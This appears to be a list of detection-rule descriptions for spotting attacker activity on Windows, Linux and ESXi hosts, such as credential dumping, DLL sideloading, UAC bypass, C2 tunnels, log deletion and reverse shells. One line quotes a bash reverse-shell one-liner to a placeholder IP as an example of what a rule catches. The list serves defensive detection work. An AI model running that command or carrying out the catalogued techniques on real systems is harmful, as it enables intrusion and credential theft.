Detects the use of "vim" and its sibling commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects file access requests to cryptocurrency files by uncommon processes. This could indicate an attempt to steal cryptocurrency wallets.
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" fun
Detects file access requests to the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::m
Detects suspicious processes based on name and location that access the Windows credential manager and vault, which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi
Detects file access attempts to sensitive Microsoft Teams files (leveldb, cookies) by an uncommon process.
Detects potential DLL sideloading of "DbgModel.dll"
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually i
Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
Detects potential DLL sideloading of "MpSvc.dll".
Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensit
Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker t
Detects file creation events with filename patterns used by CrackMapExec.
Detects the presence and execution of Inveigh via dropped artefacts
Detects the creation of files generated by Mimikatz such as ".kirbi", "mimilsa.log", etc.
Detects the use of the NPPSpy hacktool, which writes the cleartext passwords of users who log on to a local file.
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies o
Detects a dump file written by QuarksPwDump password dumper
Detects the creation of files with specific names used by the RemoteKrbRelay SMB Relay attack module.
Detects default lsass dump filename generated by SafetyKatz.
Detects files written by the different tools that exploit HiveNightmare
Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations (outside of "System32", "SysWOW64", etc.). It is highly recommended to
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have
Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Detects network connections from the Equation Editor process "eqnedt32.exe".
Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
Detects a network connection initiated by Cmstp.EXE. It is uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
Detects network connections to Cloudflared tunnel domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects the creation of files with scripting or executable extensions by the MySQL daemon, which could be an indicator of "User Defined Functions" abuse to download malware.
Detects programs that connect to known malware callback ports based on threat intelligence reports.
Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Win
Detects "RegAsm.exe" initiating a network connection to public IP addresses
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker
Detects suspicious user agent strings used by malware in proxy logs
Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or si
Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post-compromise internet test activity.
Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom
Detects suspicious user agent strings used in APT malware in proxy logs
Detects Baby Shark C2 Framework default communication patterns
Detects the update check performed by Advanced IP/Port Scanner utilities.
Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling tha
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Att
Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communicatio
Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network co
Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
Detects initiated network connections to crypto mining pools
Detects the creation of a file with an uncommon extension in an Office application startup folder
Detects creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework
Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them
Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to b
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode.
Detects the creation of files by the "node.exe" process in the ".vscode-server" directory. This could be a sign of remote file creation via the VsCode tunnel feature
Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence
Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<usern
Detects the creation of a hidden file/folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powers
Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
Detects a network connection initiated by "Regsvr32.exe"
Detects a remote DLL load event via "rundll32.exe".
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can someti
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and Loc
Detects changes to the ESXi syslog configuration via "esxcli"
Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.
Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
Detects potential SQL injection attempts via GET requests in access logs.
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
Detects listing or file reading of ".dockerenv", which can be a sign of potential container discovery
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
Detects user account creation on ESXi system via esxcli
Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
Detects default CSExec service filename which indicates CSExec service installation and execution
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
Detects default RemCom service filename which indicates RemCom service installation and execution
Detects potential DLL sideloading of "AVKkid.dll"
Detects potential DLL sideloading of "EACore.dll"
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directo
Detects potential DLL sideloading of "vivaldi_elf.dll"
Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
Detects potential DLL sideloading of "CCleanerDU.dll"
Detects potential DLL sideloading of "CCleanerReactivator.dll"
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
Detects programs on a Windows system that should not write executables to disk
Detects programs on a Windows system that should not write scripts to disk
Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
Detects potential DLL sideloading of "appverifUI.dll"
Detects potential DLL sideloading of "ShellDispatch.dll"
Detects suspicious process command line that uses base64 encoded input for execution with a shell
Detects the creation of a new named pipe using the "mkfifo" utility
Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
Detects potential DLL sideloading of "7za.dll"
Detects potential DLL sideloading of "edputil.dll"
Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Detects usage of crontab to list the tasks of the user
Detects the use of wget to download content to a suspicious directory
Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
Detects the use of grep to discover specific files created by the GobRAT malware
Detects the creation of shell scripts under the "profile.d" path.
Detects execution of shells from a parent process located in a temporary (/tmp) directory
Detects execution of binaries located in potentially suspicious locations via "nohup"
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
Detects PowerShell core DLL being loaded by an Office Product
Detects changes to sensitive and critical files. Monitors files on a Linux system that you don't expect to change without planning.
Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2
Detects potential DLL sideloading of "wwlib.dll"
Detects suspicious requests to Telegram API without the usual Telegram User-Agent
Detects Bitsadmin connections to domains with uncommon TLDs
Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
Detects the creation of the LiveKD driver, which is used for live kernel debugging
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
Detects potential DLL sideloading of "chrome_frame_helper.dll"
Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
Detects the creation of binaries in the WinSxS folder by non-system processes
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legiti
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can sometimes be a sign of a dropper script trying to achieve persistence.
Detects Rclone config files being created
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homo
Detects potential DLL sideloading of "SolidPDFCreator.dll"
Detects creation of a file named "ntds.dit" (Active Directory Database)
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to
Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
Detects suspicious files, based on their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
Detects suspicious encoded User-Agent strings, as seen used by some malware.
Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
Detects a suspicious curl process start that adds a file to a web request
Detects usage of "xterm" as a potential reverse shell tunnel
Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD accou
Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Detects execution of the bash shell with the interactive flag "-i".
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often lever
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
Detects CLR DLL being loaded by an Office Product
Detects any assembly DLL being loaded by an Office Product
Detects Windows shells and scripting applications that write files to suspicious folders
Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location
Detects potential DLL sideloading of rcdll.dll
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Detects the creation of the default output filename used by the wmiexec tool
Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files i
Detects creation of the PsExec key file, which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context
Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Roaming, LocalLow). This method could be used
Detects the creation of an Office macro file from a suspicious process
Detects the creation of a new Outlook form which can contain malicious code
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumer activity.
Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
Detects cmstp loading "dll" or "ocx" files from suspicious locations
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can
Detects SILENTTRINITY stager dll loading activity
Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrup
Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
Detects an unexpected file being deleted by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Detects any GAC DLL being loaded by an Office Product
Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA Macros.
Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
Detects the creation of a macro file for Outlook.
Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
Detects when the file "passwd" or "shadow" is copied from a tmp path
Detects common command used to enable bpf kprobes tracing
Detects possible Java payloads in web access logs
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Detects use of iptables to flush all firewall rules, tables and chains and allow all network traffic
Detects attempts to force stop the ufw using ufw-init
Detects usage of system utilities to discover system network connections
Detects execution of the "mount" command with the "hidepid" parameter to hide processes from other users on the system
Detects usage of the "touch" process in service file.
Detects the creation or modification of a vscode related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP fil
Detects the creation of files that look like exports of the local SAM (Security Account Manager)
Detects files dropped by Winnti as described in RedMimicry Winnti playbook
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Detects execution of "git" in order to clone a remote repository that contains suspicious keywords
Detects the creation of a doas.conf file on a Linux host.
Detects creation of a cron file or files in Cron directories, which could indicate potential persistence.
Detects creation of a sudoers file or files in the "sudoers.d" directory, which can be used as a potential method to persist privileges for a specific user.
Detects usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, both of which are related to the TripleCross persistence method
Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
Detects suspicious sub processes of web server processes
Detects usage of "find" binary in a suspicious manner to perform discovery
Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
Detects exploitation attempt using the JNDI-Exploit-Kit
Detects command line parameters or strings often used by crypto miners
Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Attempts to load dismcore.dll after dropping it
Detects usage of the "usermod" binary to add users to the root or sudoers groups
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Detects potential DLL sideloading using comctl32.dll to obtain system privileges
Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd
Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Err
Detects javaw.exe in AppData folder as used by Adwind / JRAT
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which, in combination with the "PhoneDeepLink" flag, tries to load this DLL. Adversaries can d
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Detects usage of system utilities (only grep and egrep for now) to discover security software
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) o
Detects the pattern of a UAC bypass using Windows Event Viewer
Detects common commands used in Windows webshells
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors
Detects suspicious malformed user agent strings in proxy logs
Detects default PsExec service filename which indicates PsExec service installation and execution
Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious mo
Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be a
This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the s
This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health servi
Detects disabling security tools
Detects NetNTLM downgrade attack
Detects processes loading modules related to PCRE.NET package
Detects processes creating temp files related to PCRE.NET package
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detects setting proxy configuration
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* pre
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Ag
Detects suspicious change of file privileges with chown and chmod commands
Detects source code enumeration that uses GET requests with keyword searches in URL strings
Detects suspicious file type dropped by an Exchange component in IIS
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard ut
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
Detects the usage of utilities such as 'systemctl', 'service', etc. to stop or disable tools and services
Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity
Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Detects usage of the 'chattr' utility to remove immutable file attribute.
Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack th
Detects a suspicious curl process start on Linux with a user-agent option set
Detects enumeration of local network configuration
Detects Bitsadmin connections to IP addresses instead of FQDN names
Detects programs on a Windows system that should not write an archive to disk
Detects DLL sideloading of DLLs that are part of third party software (Zoom, Discord, etc.)
Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context
Adversaries may interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
Detects creation of a malicious DLL file in the location of the OneDrive or Teams applications. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is
Detects a flashplayer update from an unofficial location
Detects when an attacker creates a similar folder structure to Windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Sea
Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
Detects the creation of suspicious binary files inside the "\windows\system32\spool\drivers\color\" directory as seen in the blog referenced below
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL from temp or any user-controlled location in the user's %PATH%
Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Detects privileged user or group reconnaissance based on event ID 4661 and known privileged user or group SIDs
Detects potential overwriting and deletion of a file using DD.
Detects suspicious user agent strings used by hacking tools in proxy logs
Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execu
Detects execution of the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
Detects events with patterns found in commands used for reconnaissance on linux systems
Detects XSS attempts injected via GET requests in access logs
Detects SSTI attempts sent via GET requests in access logs
Detects the creation of a diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Detects chmod targeting files in abnormal directory paths.
Detects java process spawning suspicious children
This rule detects suspicious files created by Microsoft Sync Center (mobsync)
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
Get-Variable is a valid PowerShell cmdlet. WindowsApps is by default in the path where PowerShell is executed, so when the Get-Variable command is issued on PowerShell execution, the system first looks
Detects an executable that isn't dropbox but communicates with the Dropbox API
Detects suspicious interactive bash as a parent to rather uncommon child processes
Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
Detects the usage of the unsafe bpftrace option
Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users
Detects the creation of log files during a TeamViewer remote session
TeamViewer_Desktop.exe is created during install
Detects the creation of new Office macro files on the system
Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 3
Detects the creation of tasks from processes executed from suspicious locations
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in
Detects ransomware creating a txt file on the user's Desktop
Detects suspicious user agent strings used by crypto miners in proxy logs
Detects usage of base64 utility to decode arbitrary base64-encoded text
Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
Detects potentially suspicious empty user agent strings in proxy logs. Could potentially indicate an uncommon request method.
Detects the enumeration of other remote systems.
Detects Octopus Scanner Malware.
Potential adversaries accessing the microphone and webcam in an endpoint.
Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
Detects handles requested to SAM registry hive
Detects handle requests and access operations to specific registry keys to calculate the SysKey
Detects Windows PowerShell Web Access
Detects WebDav DownloadCradle
Detects WMI command line event consumers
Detects file writes of WMI script event consumer
Detects process connections to a Monero crypto mining pool
Detects system information discovery commands
